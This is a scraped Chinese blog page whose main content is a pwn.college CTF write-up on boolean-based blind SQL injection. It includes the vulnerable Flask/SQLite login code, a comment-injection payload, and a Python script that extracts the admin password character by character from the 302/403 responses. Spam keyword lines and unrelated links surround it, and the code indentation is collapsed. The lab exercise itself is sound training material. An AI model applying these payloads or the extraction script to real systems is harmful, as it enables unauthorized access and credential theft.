当前位置: 首页 > news >正文

设计师网站十大网站wordpress 社交模板

设计师网站十大网站,wordpress 社交模板,模板网站会影响网站优化吗,wordpress注册会员插件在这个场景中,我们需要利用SQL注入漏洞来泄露flag,但是应用程序并不会直接返回查询结果。相反,我们需要根据应用程序的行为差异(登录成功与否)来推断查询结果。这就是所谓的"布尔盲注"(Boolean-b…

在这个场景中,我们需要利用SQL注入漏洞来泄露flag,但是应用程序并不会直接返回查询结果。相反,我们需要根据应用程序的行为差异(登录成功与否)来推断查询结果。这就是所谓的"布尔盲注"(Boolean-based Blind SQL Injection)。

我们可以通过构造一系列的"是/否"问题,并根据应用程序的响应来逐位获取flag。

服务器的处理逻辑如下所示:

#!/opt/pwn.college/pythonimport tempfile
import sqlite3
import flask
import osapp = flask.Flask(__name__)class TemporaryDB:def __init__(self):self.db_file = tempfile.NamedTemporaryFile("x", suffix=".db")def execute(self, sql, parameters=()):connection = sqlite3.connect(self.db_file.name)connection.row_factory = sqlite3.Rowcursor = connection.cursor()result = cursor.execute(sql, parameters)connection.commit()return resultdb = TemporaryDB()
# https://www.sqlite.org/lang_createtable.html
db.execute("""CREATE TABLE users AS SELECT "admin" AS username, ? as password""", [open("/flag").read()])
# https://www.sqlite.org/lang_insert.html
db.execute("""INSERT INTO users SELECT "guest" as username, "password" as password""")@app.route("/", methods=["POST"])
def challenge_post():username = flask.request.form.get("username")password = flask.request.form.get("password")if not username:flask.abort(400, "Missing `username` form parameter")if not password:flask.abort(400, "Missing `password` form parameter")try:# https://www.sqlite.org/lang_select.htmlquery = f'SELECT rowid, * FROM users WHERE username = "{username}" AND password = "{password}"'print(f"DEBUG: {query=}")user = db.execute(query).fetchone()except sqlite3.Error as e:flask.abort(500, f"Query: {query}\nError: {e}")if not user:flask.abort(403, "Invalid username or password")flask.session["user"] = usernamereturn flask.redirect(flask.request.path)@app.route("/", methods=["GET"])
def challenge_get():if not (username := flask.session.get("user", None)):page = "<html><body>Welcome to the login service! Please log in as admin to get the flag."else:page = f"<html><body>Hello, {username}!"return page + """<hr><form method=post>User:<input type=text name=username>Pass:<input type=text name=password><input type=submit value=Submit></form></body></html>"""app.secret_key = os.urandom(8)
port = 8080 if os.geteuid() else 80
app.config['SERVER_NAME'] = f"challenge.localhost:{port}"
app.run("challenge.localhost", port)

这里我们需要构造合适的payload:  

admin"--

-- 注释掉查询的剩余部分

整个查询会变成:

SELECT rowid, * FROM users WHERE username = "admin"--" AND password = "anything"

进一步得到

SELECT rowid, * FROM users WHERE username = "admin" AND substr((SELECT password FROM users WHERE username="admin"), 1, 1) = "a"--" AND password = "anything"

构造脚本逐字符猜测

import requests
import stringurl = "http://challenge.localhost:8080"
flag = ""
charset = string.printable.strip()def check(payload):response = requests.post(url, data={"username": payload, "password": "anything"}, allow_redirects=False)return response.status_code == 302# 获取flag长度
for i in range(1, 100):payload = f'admin" AND length((SELECT password FROM users WHERE username="admin")) = {i}--'if check(payload):print(f"Flag length: {i}")flag_length = ibreak# 获取flag内容
for i in range(1, flag_length + 1):for char in charset:payload = f'admin" AND substr((SELECT password FROM users WHERE username="admin"), {i}, 1) = "{char}"--'if check(payload):flag += charprint(f"Current flag: {flag}")breakprint(f"Final flag: {flag}")

http://www.yayakq.cn/news/528030/

相关文章:

  • 国外 外贸 网站 源码奢侈品 网站建设方案
  • 阿里云Windows网站建设wordpress页脚修改
  • wordpress 建立模型没有网站做优化
  • 个人如何做网站网站添加备案
  • 淘宝网站可以做轮播吗网站建设云服务器
  • 建设网站技术要求拍婚纱照
  • 没有网站可以icp备案wordpress中文版安装教程
  • iis6 静态网站服装网站建设方法
  • django网站开发实例页面设计升级
  • 网站开发技术书籍wordpress回复框无法加载
  • 网站开发周记30篇企业网络营销方案
  • 防止做网站的人修改数值wordpress网站搬家
  • 怎样防止别人利用自己的电脑做网站服务器商城网站开发实训报告
  • 专业建设网站服务网站运营与推广方案
  • 共和网站建设公司网站优化的监测评价
  • 佛山网站建设团队网站建设对用户影响
  • 电子商务网站软件建设的核心是什么wordpress访客统计插件
  • 建设项目查询网站宿迁建设网站
  • 学做网站看那个网怎样注册网店开网店
  • 网站建设怎么样wordpress账户
  • 东营企业网站排名优化移动端网站建设 新闻动态
  • 企业购物网站建设门户网站的基本功能
  • 如何建设移动端网站网站原型图怎么做
  • 西安网站制作公司怎么选台海最新24小时消息
  • 网站开发和app开发哪个难网站编程入门教程
  • html5培训网站模板wordpress根据id排序
  • 网站建设代码流程怎么做地区网站
  • 色一把做最好的网站电商网站的需求文档
  • 淘宝网站域名wordpress内容登陆后可见
  • 公司新闻做网站中国住建网查询证书